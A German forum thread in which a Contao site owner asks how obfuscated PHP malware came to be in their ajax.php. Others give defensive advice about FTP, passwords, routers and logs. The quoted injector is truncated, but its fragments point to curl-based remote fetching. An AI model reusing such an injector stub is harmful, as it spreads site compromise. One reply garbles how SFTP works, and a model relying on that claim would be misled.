ajax.php gehackt?

[stixer]

Hi.

Mir ist gerade eine Seite vom Provider gleöscht worden, nachdem Schadsoftware entdeckt wurde.

Es handelt sich um folgendes, das ich in der ajax.php gefunden habe:

<?php /*versio:2.11*/$QOOQO=0;$GLOBALS['QOQO'] = '9fY3VybA9X2luaXQ4YWxsb3dfdXJsX2ZvcGVuMQX3NldG9wdA X2V4ZWM800XwdY2xvc2Uf$PGltZyBzcm […]

Anscheinend ist das per FTP aufgespielt worden.
Kennt das jemand? Wo könnte die Lücke sein?

Grüße!

[Nina]

Grundsätzlich zum Thema Contao gehackt (Wiki-Info dazu)

[BugBuster]

Nur mal interessehalber (für mein Integrity Check Modul), war nur diese infiziert oder auch andere wie index.php, main.php ...?
War das diese: system/modules/backend/Ajax.php ? Oder eine ander aus einer Erweiterung?

[stixer]

Es handelt sich um die Ajax.php im root – ich glaube, von der Erweiterung "ajax".

[FloB]

Das schaut definitiv nach einem infizierten Computer aus.

[stixer]

Ich habe einen Mac, und so wenig sinnvoll Virenprogramme dafür sind, ich habe trotzdem mit einem einen Testlauf gemacht. Kein Virus...

Und wie gesagt, laut Provider kam das script per FTP auf den Server an einem Tag, an dem ich definitiv nicht im Netz war.

Falls jemand damit was anfangen kann, hier das Skript ganz oben in der Ajay.php:

<?php
/*versio:2.11*/$QOOQO=0;$GLOBALS['QOQO'] = '…jede Menge Zeichen und Buchstaben …
;?>

[FloB]

Hat jemand anderes Zugriff auf diese FTP-Daten? Wurden die Daten eventuell von der Website "geklaut" – Passwörter ändern! Warst du mal von einem anderen PC auf dem FTP bzw. Account deines Webhosters? Wie sieht deine Netzwerkkonfiguration aus (--> Router gehackt?)? Welches OS X? Welches FTP-Programm (BTW: nutze lieber SFTP/SCP oder zumindest Secure FTP)? Dann gibt es noch die Möglichkeit, dass auf Seiten des Hosters es zu einem Leak im File System (via FTP kam) … viele, viele Möglichkeiten ;-).

[stixer]

Hat jemand anderes Zugriff auf diese FTP-Daten?

Nein.

Passwörter ändern!

ist natürlich längst passiert.

Warst du mal von einem anderen PC auf dem FTP bzw. Account deines Webhosters?

Nein.

Wie sieht deine Netzwerkkonfiguration aus (--> Router gehackt?)?

Mein MAMP nutzt die Standard-Hosts, also root/root. Aber dass mein Router gehackt wurde, erscheint mir nicht plausibel. Dummerweise kann ich nicht rekapitulieren, wo das script zuerst war, also local oder online. Ich vermute aber, dass das online passiert ist.

Welches FTP-Programm (BTW: nutze lieber SFTP/SCP oder zumindest Secure FTP)?

Ich nutze ForkLift2. SFTP nutze ich nicht. Wäre das denn sinnvoll?

Danke!

[Flex]

sFTP ist immer zu empfehlen... Bei normalem FTP werden Benutzername und Passwort im Klartext übermittelt... So ist es relativ einfach sich diese anzueignen... In offenen WLans kann soetwas z. B. passieren.

[FloB]

Mein MAMP nutzt die Standard-Hosts, also root/root.

Me not approve. Wenn du root brauchst, ist das immer ein Zeichen dafür, dass etwas nicht sauber eingestellt ist.

Aber dass mein Router gehackt wurde, erscheint mir nicht plausibel.

Viele Router sind ein großes Sicherheitsproblem. Ist die Firmware aktuell? Welches Modell setzt du ein?

Dummerweise kann ich nicht rekapitulieren, wo das script zuerst war, also local oder online. Ich vermute aber, dass das online passiert ist.

Frage mal bei deinem Hoster nach, ob du die entsprechenden Log-Einträge bekommen kannst. Dann würde ich die IP mit deinem ISP abgleichen, dass du feststellen kannst, ob du der "Urheber" warst oder jemand anderes. (IP-Range checken, wenn positiv, dann fragen: Ist IP x zu Zeitpunkt Y mit meinem Anschluss Kdnnr. Z benutzt worden? Begründung dazu!)

Ich nutze ForkLift2. SFTP nutze ich nicht. Wäre das denn sinnvoll?

SFTP ist nicht eine Portierung von FTP, sondern ein neues Protokoll über SFTP (auf Basis von SCP). Ist sehr sinnvoll, das einzusetzen, da SSH eine sehr sichere Authentifizierung und stark verschlüsselte Verbindung verwendet (vorausgesetzt, man benutzt die richtigen Algorithmen).